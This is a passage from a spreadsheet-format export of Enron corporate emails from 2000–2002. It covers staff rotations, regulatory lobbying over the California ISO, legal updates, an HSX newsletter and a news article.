cc: Hunter S Shively/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron _x000D_
Subject: _x000D_
_x000D_
Shelly, _x000D_
_x000D_
Hunter spoke with Li today and agrees that her first rotation should be in _x000D_
Vince's group doing modelling, etc.  This will give her the broadest _x000D_
experience for a first rotation.  I'm sure the other person in question, _x000D_
Vikas, will do very well in Hunter's group.  _x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 30 Jun 2001 15:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekly Update</t>
  </si>
  <si>
    <t>Louise,_x000D_
_x000D_
Attached is the weekly update on Asset Marketing.  I will see you on Monday at 2:00 pm to discuss where we are on the various deals._x000D_
_x000D_
 _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Don</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rbw@mrwassoc.com'})</t>
  </si>
  <si>
    <t>Assistance of QF regulatory risks</t>
  </si>
  <si>
    <t>Bob,_x000D_
_x000D_
I received approval for MRW's assistance to Enron related to regulatory risks _x000D_
facing QFs.    This includes information on changes to SRAC, capacity _x000D_
payments, and GMMs, as they occur both at CPUC and the legislature.  We are _x000D_
also interested in industry intelligence on actions of other QFs to find _x000D_
creditworthy markets for their products.   I may ask you to participate on _x000D_
upcoming "update" calls, as I did twice last week.  You may also forward to _x000D_
me materials that you perceive to be of material interest on this issue._x000D_
_x000D_
The project budget is not to exceed $1,500 including your efforts from the _x000D_
last 2 weeks.  Please give me a heads up if you get near this budget amount._x000D_
_x000D_
Please send the invoice to my attention 121 SW Salmon St. Portland OR 97214.  _x000D_
_x000D_
Please put on the reference line:  RCR AC0S-4USV7S.  _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Alan Comnes_x000D_
Enron Corp</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2000 03:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'leonard.tham@enron.com'})</t>
  </si>
  <si>
    <t>Generation</t>
  </si>
  <si>
    <t>I am trying to pull together a report on the future of the gas market in _x000D_
Texas.  I was wondering if you have a report that shows new generation coming _x000D_
on in the next 3-4 years as well as a report that shows current generation.  _x000D_
The names of the companies building/owning the facilities is not important.  _x000D_
The most important data is MW capacity as well as type of generation (i.e., _x000D_
natural gas, coal, etc.)_x000D_
_x000D_
Do you have this information?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric_x000D_
x3-0977</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 15:59:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'listmaster@listsrv.hsx.com'})</t>
  </si>
  <si>
    <t>HSX: This Week on the Exchange</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
=09=09 [IMAGE]   home     |    movies     |    music     |    community    =_x000D_
=09_x000D_
=09=09=09_x000D_
 HSX : This Week May 9, 2001       Think this summer is going to be pitsvil=_x000D_
le now that Survivor Warrants and Award Options are a thing of the past? We=_x000D_
ll, you can stop crying. We here at HSX have a brand new set of warrants we=_x000D_
 developed just to keep you busy during the summer months. Summer Blockbust=_x000D_
er Warrants  allow you to invest in the financial success of upcoming summe=_x000D_
r flicks. Think A Knight's Tale will give The Mummy Returns a run for its m=_x000D_
oney? Well, put your money where your mouth is and purchase Blockbuster War=_x000D_
rants. Personally, I'm banking on them to help me make up for shorting The =_x000D_
Mummy this weekend. *Sigh*   Adios, Erin Margolis, Editor Hollywood Stock E=_x000D_
xchange (email Erin at HSXEditor@hsx.com )    This Week Brought to You By: =_x000D_
 [IMAGE]       Weekly Movers                 STARBONDS_x000D_
                     name symbol price change        [IMAGE] Dwayne "The Ro=_x000D_
ck" Johnson  TROCK  H$1116 +168        [IMAGE] Eddie Murphy  EMURP  H$978 +=_x000D_
88        [IMAGE] Jennifer Lopez  JLOPE  H$1187 +87        [IMAGE] Ray Liot=_x000D_
ta  RLIOT  H$754 -92        [IMAGE] Drew Barrymore  DBARR  H$1193 -196  [IM=_x000D_
AGE] Rachel Griffiths  RGRIF  H$777 -243        MOVIESTOCKS_x000D_
         name symbol price change  [IMAGE] Jurassic Park 3  JURA3  H$125.11=_x000D_
 +21 1/2  [IMAGE] The Mummy Returns  MUMY2  H$159.69 +15  [IMAGE] Charlie's=_x000D_
 Angels 2  CHAR2  H$32.05 +11 3/4  [IMAGE] Butterfly  PROJ3  H$69.00 -9 1/2=_x000D_
  [IMAGE] American Pie 2  AMPI2  H$73.35 -13  [IMAGE] Lord of the Rings 3  =_x000D_
LRDR3  H$95.65 -18 1/2             Movie Market Lab  Have a hankering for m=_x000D_
ore Market info? The Market  Lab  has all the data you crave and the up-to-=_x000D_
the-second reports on all of your StarBonds and MovieStocks.               =_x000D_
ARTISTSTOCKSTM         name symbol price change  [IMAGE] Destiny's Child  D=_x000D_
ESTI  H$58.96 +2 3/4  [IMAGE] Nine Days  9DAYS  H$8.06 +2 1/4  [IMAGE] Tool=_x000D_
  TOOL  H$49.68 +1 5/8  [IMAGE] Ghostface Killah  GHOST  H$6.21 -1 3/4  [IM=_x000D_
AGE] The Fugees  FUGEE  H$21.85 -2  [IMAGE] Orbital  ORBIT  H$9.92 -2 1/8  =_x000D_
           Music Market Lab  Keep on top of all things music by making dail=_x000D_
y visits to our  Market  Lab .                  Get the Insider's View Get =_x000D_
four free issues of The Hollywood Reporter! If it's happening in    show bu=_x000D_
siness,  you'll find it in the pages of The Hollywood Reporter. For 70 year=_x000D_
s, it has been the trade paper of choice for industry professionals.  Find =_x000D_
out why by trying the next four issues of the weekly edition risk free!  Cl=_x000D_
ick here  for details.                Last Week on the Exchange           T=_x000D_
he Market Calendar lists all the IPOs, adjusts, and delists on the Exchange=_x000D_
.  Check out this week's Movie Market  and  Music Market  for details.     =_x000D_
  The following securities cashed out:  name symbol delist price  Tina   Su=_x000D_
rvivor Warrant  TINSW  H$16.00  Colby  Survivor Warrant  COBSW  H$15.00  Ke=_x000D_
ith   Survivor Warrant  KEISW  H$14.00       name symbol delist price  Poll=_x000D_
ock  PLLCK  H$8.11      Joe Dirt  JDIRT  H$24.74  Josie and the Pussycats  =_x000D_
JOSIE  H$13.83      Kingdom Come  KINGC  H$20.48  Bridget Jones's Diary  BJ=_x000D_
DIA  H$44.47       name symbol delist price  The Mummy Returns Call  MUMCA =_x000D_
 H$18.14  The Mummy Returns Put  MUMPU  H$0.00     The following MovieStock=_x000D_
s delisted at H$0.00 since they did not have a theatrical release::  name s=_x000D_
ymbol delist price  Aberdeen  ABRDN  H$0.00  Cut  CUT  H$0.00              =_x000D_
    The new price adjusts for April 8:   name symbol halted earned adjusted=_x000D_
   [IMAGE] The Mummy Returns   MUMY2  H$159.69 $70.1 million H$203.29      =_x000D_
 Need a Few Extra Hollywood Dollars ? You need money to make money, so ente=_x000D_
rtainment investing rule number one is "Gimme the Cash." The Hollywood Stoc=_x000D_
k Exchange wants to give you the chance to feed your wallet.  Interested?  =_x000D_
      Summer Blockbuster Warrants Think Pearl Harbor has a chance for the r=_x000D_
ecord books? What about Tomb Raider? Summer Blockbuster Warrants  give HSX =_x000D_
traders an opportunity to invest in  the long-term financial success of the=_x000D_
 biggest films of Summer 2001.        Tell-a-Friend Summer is all about kic=_x000D_
king back and relaxing?and earning Hollywood Dollars has never been easier.=_x000D_
  Hence, the Easy Money Club!  When you Tell-a-Friend  about HSX, you earn =_x000D_
25 percent on their profits!            New IPOs! The following securities =_x000D_
are trading on the Exchange:  MOVIE MARKET  IPO for May 7: George of the Ju=_x000D_
ngle 2  (GRGJ2)  IPO for May 8: Spun  (SPUN)  IPOs for May 9: Hero  (HERO) =_x000D_
Soul Calibur   (SOULC)  IPOs for May 10: The Fourth Hand   (4HAND) The Good=_x000D_
 German  (GDGRM)  IPO for May 11: The Company Man  (COMPM)  IPO for May 12:=_x000D_
 Genie in a Bottle  (GENIE)    MUSIC MARKET  IPO for May 7: Jack Johnson  (=_x000D_
JACKJ)  IPO for May 8: Spacehog   (SPHOG)  IPO for May 9: Gorillaz   (GORIL=_x000D_
)  IPO for May 10: Minibar   (MINIB)  IPO for May 11: Jim White   (JIMWH)  =_x000D_
    Your Account  To unsubscribe  or opt for a text-only  version of this e=_x000D_
mail, log in and update your preferences .   Can't remember your password? =_x000D_
Click here   and enter your username or email address.  If you have a quest=_x000D_
ion regarding your account or playing HSX, please  contact us at any of the=_x000D_
 following email addresses:  info@hsx.com  support@hsx.com  unsubscribe@hsx=_x000D_
.com      Album Options &amp;  Platinum Warrants Album Options  and Platinum Wa=_x000D_
rrants  are now available on the Music Market. Album Options allow you to i=_x000D_
nvest in the latest releases from your favorite artists, while Platinum War=_x000D_
rants let you bet on whether or not it will be a hit.   The following Album=_x000D_
 Options will begin trading this week:  Depeche Mode - Exciter     (ODM10) =_x000D_
Missy Elliott - Miss E?So Addictive     (OMSE3) REM - Reveal     (ORM12) We=_x000D_
ezer - Weezer     (OWEE3) Tool - Lateralus     (OTOO4)       Advertisement:=_x000D_
  [IMAGE]     Opening This Week... A Knight's Tale  (KTALE)     Free Stuff =_x000D_
Do you consider yourself a guru of useless knowledge? Why don't you test yo=_x000D_
ur know-how and give our trivia page a shot for cool prizes? For all you mo=_x000D_
vie junkies out there, we offer the  HSX Trivia Challenge.   And for those =_x000D_
of you who are musically inclined, try the This Week in Music History  game=_x000D_
.      Get a Free HSX T-Shirt! Purchase item(s) from one of our retail part=_x000D_
ners listed at the HSX Market Place  and receive an HSX t-shirt for FREE! O=_x000D_
ffer good until May 13 or while supplies last. HURRY!                Copyri=_x000D_
ght ? 1996-2001 Hollywood Stock Exchange_x000D_
, All Rights Reserved.           =09=09=09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Jul 2001 08:26:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Modesto</t>
  </si>
  <si>
    <t>Virginia,_x000D_
_x000D_
No problem, sorry for the delay.  The deal number is 693176._x000D_
_x000D_
Thanks, Sean_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Thompson, Virginia  _x000D_
Sent:	Wednesday, July 18, 2001 2:10 PM_x000D_
To:	Crandall, Sean_x000D_
Subject:	Modesto_x000D_
_x000D_
Sean,_x000D_
_x000D_
  Don't want to hound you, but Houston has to send payment today and it's 4 pm there._x000D_
  Let me know if you want me to enter an annuity_x000D_
_x000D_
  Virginia</t>
  </si>
  <si>
    <t>Tue, 12 Jun 2001 06:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Draft Energy legislation</t>
  </si>
  <si>
    <t xml:space="preserve">Leaving voicemail with two comments: 1 ) Demand buydown: establish _x000D_
participation threshold of 20 kw...residential inclusion is unnecessary and _x000D_
will draw additional fire........2) Eliminating undue discrimination: we _x000D_
should make clear that non-discrimination means all uses of transmission _x000D_
system subject to FERC's jurisdiction shall be treated in a _x000D_
non-discriminatory manner. Thanks._x000D_
_x000D_
_x000D_
From: Tom Briggs on 06/12/2001 11:42 AM_x000D_
To: Linda Robertson/NA/Enron@ENRON, James D Steffes/NA/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Steven J Kean/NA/Enron@Enron, Sarah _x000D_
Novosel/Corp/Enron@ENRON, John Shelk/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Draft Energy legislation_x000D_
_x000D_
Attached please find draft legislation for Reliability and Demand Buy-Down.  _x000D_
The language is to be submitted to the DOE drafting team on Wednesday _x000D_
afternoon.  Please provide comments and suggestions directly to me ASAP so _x000D_
that I can make revisions for final submission._x000D_
_x000D_
Adiitional language on 1) interconnections, 2) FERC jurisdiction over _x000D_
non-jurisdictional transmission services,3)PUCHA repeal and 4) Tribal land _x000D_
ROW should be circulated later today._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 07:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'craiggannett@dwt.com', 'linda.robertson@enron.com', 'cynthia.sandherr@enron.com'})</t>
  </si>
  <si>
    <t>RE: Questions you requested</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mary Hain/HOU/ECT on 01/30/2001 03:56 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Mary Hain_x000D_
01/30/2001 03:45 PM_x000D_
To: Paul Kaufman/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: Questions you requested  _x000D_
_x000D_
The available transmision capacity (ATC) "derate" did occur and has occured _x000D_
everydaysince about the 24th.  This fact was verified to me by our ISO _x000D_
customer contact on Friday.  Although we do not have the E-mails anymore, the _x000D_
ISO sends our traders E-mails everyday about the ATC on the ties, so this _x000D_
information is verifiable with the ISO.  Our customer contact didn't know _x000D_
exactly what day it had started and I have not wanted to pursue this more _x000D_
with the ISO, not knowing whether we wanted our identity divulged.  The _x000D_
reason for the zero rating is that the ISO is in a Stage 3 emergency.  The _x000D_
line was again rated at zero today.  I have been pursuing the following _x000D_
approaches to getting this issue investigated and resolved.  I've talked to _x000D_
Scott Miller at FERC and to Eric Thode in Houston.  Eric believes he can get _x000D_
the press to investigate and divulge this information for us in the trade _x000D_
press.  So check the trade press tomorrow. _x000D_
_x000D_
_x000D_
_x000D_
Paul Kaufman_x000D_
01/30/2001 02:41 PM_x000D_
To: Cynthia.Sandherr@enron.com, CraigGannett@DWT.COM, _x000D_
linda.robertson@enron.com, Mary Hain/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: RE: Questions you requested_x000D_
_x000D_
I agree with Craig ... we need to be really, really careful about the earth _x000D_
orbit issues identified below.   We shouldn't talk about the derating issue _x000D_
unless we can:   (1) confirm the derating occurred and document it; (2) tie _x000D_
the derating directly to action by the new board (i.e., determine that it _x000D_
wasn't due to maintenance or some other physical occurence); (3) show a _x000D_
direct impact on PNW prices that can't be easily explained in another way; _x000D_
and (4) show a continuing pattern (in contrast to an isolated event)._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Paul Kaufman/PDX/ECT on 01/30/2001 02:40 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Gannett, Craig" &lt;CraigGannett@DWT.COM&gt;                           _x000D_
01/30/2001 01:30 PM_x000D_
	_x000D_
_x000D_
To: "'Cynthia.Sandherr@enron.com'" &lt;Cynthia.Sandherr@enron.com&gt;_x000D_
cc: "'Hain, Mary'" &lt;mary.hain@enron.com&gt;, "'Robertson, Linda'"  _x000D_
&lt;linda.robertson@enron.com&gt;, "'Kaufman, Paul'" &lt;paul.kaufman@enron.com&gt; _x000D_
Subject: RE: Questions you requested_x000D_
_x000D_
_x000D_
_x000D_
 This excellent material, and very important, but it's pretty_x000D_
esoteric.  If you want to really kick the ISO and Davis in the shins, use_x000D_
Mary's stuff about the ISO derating the transmission line at COB.   Assuming_x000D_
it's true that the ISO has effectively shut down the northbound transmission_x000D_
route at the Oregon border in order to hoard power, and that this raised the_x000D_
market price in the NW by about $50-75 per megawatt-hour, and that this is_x000D_
costing the NW $2-5 million per day (at least for the period that Mary_x000D_
looked at), that will send the NW Senators into low earth orbit.  If we can_x000D_
establish that this derating ruse was a change adopted by Davis's handpicked_x000D_
ISO board, the NW Senators will escape Earth's gravitational pull.  For that_x000D_
very reason, we have to be able to back up anything we say, and we need to_x000D_
anticipate any defenses the ISO may have.  But if you want NW elected_x000D_
officials to quit being so polite toward Davis, that will do it._x000D_
_x000D_
 Craig_x000D_
_x000D_
-----Original Message-----_x000D_
From: Cynthia.Sandherr@enron.com [mailto:Cynthia.Sandherr@enron.com]_x000D_
Sent: Tuesday, January 30, 2001 11:21 AM_x000D_
To: joshua_sheinkman@wyden.senate.gov_x000D_
Cc: gpeters@epsa.org; Allison.Navin@enron.com; Steven.J.Kean@enron.com_x000D_
Subject: Questions you requested_x000D_
_x000D_
_x000D_
Joshua:_x000D_
_x000D_
I found the Enron staff who have had the conversations with the Oregon PUC_x000D_
so believe the attached Q&amp;A meet your request.  If you need additional_x000D_
materials, just let me know._x000D_
(See attached file: Ron Wyden Qs for Steve Kean.doc)_x000D_
_x000D_
_x000D_
In addition, EPSA sent some questions they would like the Senator to ask of_x000D_
any of the EPSA witnesses (Reliant, Calpine, Williams, or Enron) dealing_x000D_
with the Impact of the Recent changes in the Management of the California_x000D_
Independent System Operator:_x000D_
_x000D_
Background:  The Cal ISO acts as the "air traffic controller" for the_x000D_
interstate electric power grid in California.  The ISO determines who gets_x000D_
access to the grid and under what terms and conditions.  It is the ISO that_x000D_
helps ensure that access to the grid is truly open and non-discriminatory._x000D_
When the ISO was initially constituted several years ago, a "stakeholder"_x000D_
management board was created that represented a wide range of market_x000D_
interests---power sellers, generators, consumers, political leaders, etc._x000D_
After the power emergencies began last summer, this board was criticized as_x000D_
too splintered and indecisive.  In a response to this perception and in an_x000D_
effort to impose greater control over the ISO, the California state_x000D_
legislature replaced the stakeholder board with a five-person board that_x000D_
serves at the request of the California Governor._x000D_
_x000D_
QUESTION:  The Cal ISO has recently seen its management board changed from_x000D_
one with broad stakeholder representation to one appointed by the_x000D_
California Governor.  Given that California is a critical part of a larger_x000D_
western regional power market, how can we ensure that regional power needs_x000D_
are reflected in the decisions of the new state appointed Board?_x000D_
_x000D_
ANSWER:  We really can't.  Most of the time, the Board has a limited role._x000D_
However, the "traffic controller" role becomes crucial when the power_x000D_
crunch comes.  Every market participant needs to be worried that, during_x000D_
times of real power emergencies, the Cal ISO Board will be too willing to_x000D_
shoot first and ask questions later.  Companies with firm transactions_x000D_
involving out-of-state entities may find their needs and commercial_x000D_
interests sacrificed to prevent local political problems.  Instead of_x000D_
robust, competitive regional markets, politicizing transmission decisions_x000D_
practically guarantees an increasingly balkanized market._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Feb 2000 05:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ddaniels@bracepatt.com', 'dan.lyons@enron.com', 'richard.b.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Ecogas misc.</t>
  </si>
  <si>
    <t xml:space="preserve">An update on Locke Liddell's activities with Ecogas._x000D_
Received: from bpmcweb.bracepatt.com ([172.16.1.17]) by po.bracepatt.com; _x000D_
Mon, 21 Feb 2000 09:28:54 -0600_x000D_
Received: FROM mail2.lockeliddell.com BY bpmcweb.bracepatt.com ; Mon Feb 21 _x000D_
09:32:07 2000_x000D_
X-Proxy: keymaster.bracepatt.com protected by CyberGuard_x000D_
Received: from daex01.lockeliddell.com (daex01.lockeliddell.com [10.8.2.50]) _x000D_
by mail2.lockeliddell.com (8.9.3/8.9.3) with ESMTP id JAA09252; Mon, 21 Feb _x000D_
2000 09:33:05 -0600_x000D_
Received: by daex01.lockeliddell.com with Internet Mail Service (5.5.2448.0) _x000D_
id &lt;FCXPV5V7&gt;; Mon, 21 Feb 2000 09:32:47 -0600_x000D_
Message-ID: _x000D_
&lt;A1B4C8FB2C95D211A5A90008C7F4872401C443D5@houex01.lockeliddell.com&gt;_x000D_
From: "Pieringer, Stan" &lt;SPieringer@lockeliddell.com&gt;_x000D_
To: "'rstephens@bracepatt.com'" &lt;rstephens@bracepatt.com&gt;_x000D_
Cc: "'jerrel@rmisp.com'" &lt;jerrel@rmisp.com&gt;_x000D_
Subject: Ecogas misc._x000D_
Date: Mon, 21 Feb 2000 09:15:24 -0600_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2448.0)_x000D_
Content-Type: text/plain; charset="iso-8859-1"_x000D_
_x000D_
            Rob, I have  heard nothing from DTE Biomass since I sent them_x000D_
the schedule to the proposed MOU January 21.   I had previously sent it to_x000D_
them January 6.    In fact, I haven't heard anything from them since they_x000D_
got our money before Christmas.   I will follow up in the next few days_x000D_
unless there has been some development I don't know about._x000D_
_x000D_
            Also, wanted to report that we were asked to help with a $5,000_x000D_
writ of execution on Ecogas property in Austin.   Some suit in JP Court in_x000D_
Travis County over a debt by the Company's former subsidiary Ecogas_x000D_
Cryogenics Inc. in Washington state.  The Company answered without counsel_x000D_
but then apparently forgot about it.  The constable was at the door when we_x000D_
got the call on Thursday.  We are in touch trying to work it out._x000D_
_x000D_
Regards,_x000D_
_x000D_
            Stan Pieringer_x000D_
            Locke Liddell &amp; Sapp LLP_x000D_
            600 Travis Street, 35th Floor_x000D_
            Houston, Texas 77002_x000D_
            voice: 713/226-1224_x000D_
            fax: 713/223-3717_x000D_
            spieringer@lockeliddell.com &lt;mailto:spieringer@lockeliddell.com&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 04:03:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sharon.brown@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'dale.ratliff@enron.com', 'jerry.graves@enron.com', 'gary.spraggins@enron.com', 'steve.january@enron.com', 'darrell.schoolcraft@enron.com'})</t>
  </si>
  <si>
    <t>Out 1/10</t>
  </si>
  <si>
    <t xml:space="preserve">I will taking my discretionary holiday on Thursday, Jan. 10.  Be back in the office on Friday._x000D_
slb_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 05:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'pat.shortridge@enron.com', 'james.steffes@enron.com', 'ralph@censtrat.com', 'richard.shapiro@enron.com', 'kenneth.lay@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>The message is spreading</t>
  </si>
  <si>
    <t xml:space="preserve">Davis' criticism of Texas misdirected, report finds _x000D_
Lynda Gledhill, Mark Martin, Chronicle Staff Writers_x000D_
Tuesday, July 10, 2001 _x000D_
,2001 San Francisco Chronicle _x000D_
URL: _x000D_
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2001/07/10/M_x000D_
N48875.DTL _x000D_
Sacramento -- Texas-based electricity generators have received the brunt of _x000D_
criticism from Gov. Gray Davis for gouging California during the power _x000D_
crisis, but financial information released yesterday shows the lion's share _x000D_
of the money went elsewhere. _x000D_
Companies with headquarters in Texas garnered less than 10 percent of _x000D_
California's multibillion-dollar energy purchases, while public and private _x000D_
energy companies from Canada to Georgia to California got the rest. _x000D_
The $424 million that went to Texas companies may still be more than the _x000D_
state should have been charged, and administration officials are attempting _x000D_
to get refunds from a host of companies, both in and out of Texas. _x000D_
Earlier this year, Davis lambasted the Bush administration for not acting _x000D_
against power firms in his home state. "What's going on here, pure and _x000D_
simple, is unconscionable price-gouging by the big energy producers -- most _x000D_
of them, incidentally, located in Texas," he said in May. _x000D_
Yesterday, a spokesman for the governor broadened the verbal assault, saying _x000D_
the Texas firms are representative of the many other out-of-state generators _x000D_
who have also gouged California. _x000D_
"Anywhere they wear cowboy hats, they probably have handkerchiefs across _x000D_
their face because they are robbing us blind," said Steve Maviglio, Davis' _x000D_
spokesman. _x000D_
The latest financial information is contained in a report by the state _x000D_
Department of Water Resources detailing $7.2 billion in power purchases from _x000D_
Jan. 17 through the end of May. _x000D_
About $5.2 billion of that was spent on the spot market where power buys are _x000D_
made a day, hour or even a few minutes before the electricity is actually _x000D_
used. _x000D_
Because the spot purchases are made with little notice, they are the most _x000D_
expensive kind of power on the market. The state was forced to step in and _x000D_
buy the power when the credit ratings of California's major utilities dropped _x000D_
as the energy crisis worsened. The crisis was caused by a series of events _x000D_
that forced the utilities to pay more for electricity than they could recover _x000D_
from customers. _x000D_
The numbers released yesterday show that Texas companies weren't alone in _x000D_
receiving a share of the energy crisis pie. Some $1.2 billion went to Mirant, _x000D_
an Atlanta-based company. Mirant has refused to turn over documents _x000D_
subpoenaed by the state Legislature as part of its investigation into alleged _x000D_
market manipulation. Mirant could face contempt proceedings. _x000D_
Municipal generators have also fared well during the energy crisis. Powerex, _x000D_
a wholly owned power marketing subsidiary of Vancouver-based BC Hydro, _x000D_
received $1 billion from the state for spot market electricity. _x000D_
The Los Angeles Department of Water and Power, which Davis said charged _x000D_
higher average spot market prices than some generators, received $331 _x000D_
million. _x000D_
E-mail Lynda Gledhill at lgledhill@sfchronicle.com. _x000D_
,2001 San Francisco Chronicle ? Page?A - 9 </t>
  </si>
  <si>
    <t>Tue, 15 May 2001 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request ian.brungs@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for your request. You will be notified by email when your request _x000D_
has been processed. You can check the progress of your request by clicking _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000034920&amp;Page=_x000D_
MyReq._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Jan 2000 03:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: E-Commerce Boot Camp</t>
  </si>
  <si>
    <t xml:space="preserve">The flyer didn't come through - do you have a copy?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janice R Moore_x000D_
01/17/2000 11:19 AM_x000D_
To: Alan Aronowitz/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: E-Commerce Boot Camp_x000D_
_x000D_
Do you think we could get enough value out of this to warrant $2300?  _x000D_
---------------------- Forwarded by Janice R Moore/HOU/ECT on 17.01.2000 _x000D_
11:18 ---------------------------_x000D_
_x000D_
_x000D_
"Eric Sedlak" &lt;eric.sedlak@dgj.com&gt; on 15.01.2000 00:21:38_x000D_
Please respond to "Eric Sedlak" &lt;eric.sedlak@dgj.com&gt;_x000D_
To: _x000D_
cc:  (bcc: Janice R Moore/HOU/ECT)_x000D_
Subject: E-Commerce Boot Camp_x000D_
_x000D_
_x000D_
_x000D_
Enclosed is a flyer regarding E-Commerce Boot Camp in SF.  To preserve the _x000D_
confidentiality of the identities of our clients, we have addressed this _x000D_
e-mail to bcc's._x000D_
_x000D_
Please contact me or Caroline Mead in our San Francisco office should you _x000D_
require any further information or wish to send a representative._x000D_
_x000D_
_x000D_
Eric W. Sedlak_x000D_
Deacons Graham &amp; James_x000D_
6 Battery Road #22-00_x000D_
Singapore 049909_x000D_
Tel: 65-224-7787_x000D_
Fax: 65-224-7328_x000D_
E-Mail: eric.sedlak@dgj.com_x000D_
Website: www.dgj.com_x000D_
_x000D_
This message is confidential and may be legally privileged.  If you have _x000D_
received this e-mail in error, please delete the message from your computer _x000D_
and notify the sender by return._x000D_
 - att1.htm_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 03:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Status of LVCII - E-Next gas turbine breakout contract</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 04/23/2001 10:40 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bill Williams @ ECT                           04/17/2001 11:15 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron, lee.johnson@ss.ps.ge.com_x000D_
cc: Dale Rasmussen/HOU/ECT@ECT, Jody Blackburn/PDX/ECT@ECT _x000D_
_x000D_
Subject: Status of LVCII - E-Next gas turbine breakout contract_x000D_
_x000D_
Hello to all._x000D_
_x000D_
This e mail is just a request for completion status of the GE Breakout _x000D_
contract for the LVCII gas turbines.  We are contemplating a full notice to _x000D_
proceed with the EPC contractor May 1, 2001.  The breakout contract is an _x000D_
exhibit to the EPC contract, and we would like to have the executed version _x000D_
for our file._x000D_
_x000D_
No pressure - just a request for status and a heads up as to what is ongoing _x000D_
with the LVCII project._x000D_
_x000D_
Cheers_x000D_
_x000D_
Bill W._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 04:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Research Directory</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/08/2001 _x000D_
12:10 PM ---------------------------_x000D_
_x000D_
_x000D_
Shirley Crenshaw_x000D_
01/08/2001 11:07 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT, Pinnamaneni _x000D_
Krishnarao/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT, Mike A _x000D_
Roberts/HOU/ECT@ECT, Joseph Hrgovcic/HOU/ECT@ECT, Tanya _x000D_
Tamarchenko/HOU/ECT@ECT, Zimin Lu/HOU/ECT@ECT, Martin Lin/HOU/ECT@ECT, _x000D_
Maureen Raymond/HOU/ECT@ECT, Osman Sezgen/HOU/EES@EES, Paulo _x000D_
Issler/HOU/ECT@ECT, Amitava Dhar/Corp/Enron@ENRON, Alex _x000D_
Huang/Corp/Enron@ENRON, Kevin Kindall/Corp/Enron@ENRON, Kevin G _x000D_
Moore/HOU/ECT@ECT, Clayton Vernon/Corp/Enron@ENRON, William _x000D_
Smith/Corp/Enron@ENRON, Jose Marquez/Corp/Enron@ENRON, Chonawee _x000D_
Supatgiat/Corp/Enron@Enron, Shalesh Ganjoo/HOU/ECT@ECT, Tom _x000D_
Halliburton/Corp/Enron@Enron, Elena Chilkina/Corp/Enron@Enron, Sevil _x000D_
Yaman/Corp/Enron@Enron, Sofya Tamarchenko/NA/Enron@Enron, Bob _x000D_
Lee/NA/Enron@Enron, Gwyn Koepke/NA/Enron@Enron, Hector Campos/HOU/ECT@ECT, _x000D_
